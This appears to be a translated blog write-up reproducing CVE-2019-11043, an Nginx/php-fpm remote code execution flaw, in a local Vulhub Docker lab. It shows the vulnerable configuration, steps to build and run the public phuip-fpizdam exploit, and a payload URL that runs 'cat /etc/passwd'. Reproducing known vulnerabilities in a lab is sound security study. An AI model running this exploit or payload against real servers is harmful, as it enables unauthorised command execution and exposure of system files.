Suchen

Suchen

OvO
HomeArchives

CVE-2019-11043 (PHP Remote Code Execution Vulnerability)

109
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The document describes a vulnerability in Nginx related to the `fastcgi_split_path_info` directive, which can lead to remote code execution when handling requests containing the newline character (%0a). This occurs because the newline causes the `PATH_INFO` variable to be empty, exposing a flaw in php-fpm's logic. To exploit this vulnerability, specific configurations in the `nginx.conf` file are required. To reproduce the vulnerability, the author sets up a Kali machine using a Docker image from Vulnhub. After installing the necessary tools and dependencies, they clone a proof-of-concept (POC) from GitHub, compile it in a Go environment, and execute a command to demonstrate the exploit by accessing a specific URL with crafted parameters. The successful execution allows for commands like viewing the contents of the `/etc/passwd` file. Instructions for setting up the Go environment on Kali are also provided.

Vulnerability Principle#

On Nginx, fastcgi_split_path_info processes requests with %0a, which causes PATH_INFO to be empty due to encountering a newline character \n. However, php-fpm has a logical flaw when handling an empty PATH_INFO. An attacker can carefully construct and exploit this to achieve remote code execution. This vulnerability requires specific configuration in nginx.conf to be triggered. The specific configuration is as follows:

location ~ [^/]\.php(/|$) {

 ...

 fastcgi_split_path_info ^(.+?\.php)(/.*)$;

 fastcgi_param PATH_INFO $fastcgi_path_info;

 fastcgi_pass   php:9000;

 ...

}

An attacker can use a newline character (%0a) to corrupt the Regexp in the fastcgi_split_path_info directive. The corrupted Regexp leads to an empty PATH_INFO, thereby triggering the vulnerability.

Vulnerability Reproduction#

The machine used for this experiment is: Kali, with a docker image created for vulnhub. First, install vulhub, then navigate to the corresponding vulnerability directory and execute the command to create the docker image. The command is:

docker-compose build  docker-compose up -d

image
Use docker-compose config to view the configuration of the vulnerability.
image
Next, access the page:
192.168.19.128:8080 (192.168.19.128 is the IP of the Kali virtual machine)
Download and install the exploit tool using the publicly available POC on GitHub to obtain the installation package:

git clone https://github.com/neex/phuip-fpizdam.git

image
This tool needs to be compiled and run in a Go language environment, so Kali must have the Go language environment installed.
image
After entering the directory, execute the command:

go env -w GOPROXY=https://goproxy.cn
go get -v && go build

Thus, the tool is installed.
Next, reproduce the vulnerability:
Execute the command in this directory:

go run . "http://192.168.19.128:8080/index.php"

Then, you can use parameter a to pass execution commands on the page http://192.168.19.128:8080. For example, to view the contents of the /etc/passwd file, you can construct the following payload:
http://192.168.19.128:8080/?a=cat%20/etc/passwd

The vulnerability has been successfully reproduced.

The installation of the Go environment on Kali can refer to this link:
https://blog.csdn.net/WHQ556677/article/details/122283509

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.